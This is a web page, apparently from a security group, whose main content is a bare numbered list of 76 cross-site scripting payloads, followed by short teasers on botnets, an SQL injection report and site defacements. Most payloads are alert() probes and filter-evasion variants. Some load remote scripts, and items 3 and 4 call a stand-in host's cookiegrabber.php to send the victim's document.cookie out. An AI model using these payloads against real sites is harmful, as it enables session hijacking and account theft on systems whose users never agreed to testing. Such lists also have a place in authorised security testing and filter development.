1. <script>alert(1);</script>
  2. <script>alert('XSS');</script>
  3. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
  4. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
  5. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  6. <script>alert(String.fromCharCode(88,83,83))</script>
  7. <img src=foo.png onerror=alert(/xssed/) />
  8. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  9. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  10. <marquee><script>alert('XSS')</script></marquee>
  11. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  12. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  13. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  14. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  15. "><script>alert(0)</script>
  16. <script src=http://yoursite.com/your_files.js></script>
  17. </title><script>alert(/xss/)</script>
  18. </textarea><script>alert(/xss/)</script>
  19. <IMG LOWSRC=\"javascript:alert('XSS')\">
  20. <IMG DYNSRC=\"javascript:alert('XSS')\">
  21. <font style='color:expression(alert(document.cookie))'>
  22. '); alert('XSS
  23. <img src="javascript:alert('XSS')">
  24. <script language="JavaScript">alert('XSS')</script>
  25. [url=javascript:alert('XSS');]click me[/url]
  26. <body onunload="javascript:alert('XSS');">
  27. <body onLoad="alert('XSS');"
  28. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  29. "/></a></><img src=1.gif onerror=alert(1)>
  30. window.alert("Bonjour !");
  31. <div style="x:expression((window.r==1)?'':eval('r=1;
  32. alert(String.fromCharCode(88,83,83));'))">
  33. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  34. "><script alert(String.fromCharCode(88,83,83))</script>
  35. '>><marquee><h1>XSS</h1></marquee>
  36. '">><script>alert('XSS')</script>
  37. '">><marquee><h1>XSS</h1></marquee>
  38. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  39. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  40. <script>var var = 1; alert(var)</script>
  41. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  42. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  43. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  44. " onfocus=alert(document.domain) "> <"
  45. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  46. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  47. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  48. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  49. <br size=\"&{alert('XSS')}\">
  50. <scrscriptipt>alert(1)</scrscriptipt>
  51. </br style=a:expression(alert())>
  52. </script><script>alert(1)</script>
  53. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  54. [color=red width=expression(alert(123))][color]
  55. <BASE HREF="javascript:alert('XSS');//">
  56. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  57. "></iframe><script>alert(123)</script>
  58. <body onLoad="while(true) alert('XSS');">
  59. '"></title><script>alert(1111)</script>
  60. </textarea>'"><script>alert(document.cookie)</script>
  61. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  62. </script></script><<<<script><>>>><<<script>alert(123)</script>
  63. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  64. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  65. '></select><script>alert(123)</script>
  66. '>"><script src = 'http://www.site.com/XSS.js'></script>
  67. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  68. <SCRIPT>document.write("XSS");</SCRIPT>
  69. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  70. ='><script>alert("xss")</script>
  71. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  72. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  73. ">/PlanetCreator/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  74. ">/PlanetCreator/><script>alert(document.cookie)</script>
  75. src="http://www.site.com/XSS.js">
  76. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

Explore More

Tracking Down A BotNet

This will not be very long, nor will I go into excessive amounts of detail into the tools and steps required. The purpose of this paper is simply to help

Critical SQL Injection in Myanmar Calendar

PlanetCreator‘s Security Team Researcher Infofreakzzz reported another Critical SQL injection (vulnerability) on Myanmar Calendar URL : http://www.myanmarcalendar.org/ SQL injection is a code injection technique that exploits a security vulnerability occurring

Several avast sites were defaces

Last month, eight sites at once well-known anti-virus solutions avast!  Were defaces: http://www.avast.co.za/ (mirror; date: 2010-01-22 15:06:28) http://awast.org/ (mirror; date: 2010-02-18 18:57:27) http://www.avast.de/ (mirror; date: 2010-02-18 18:58:01) http://shop.avast.de/ (mirror; date: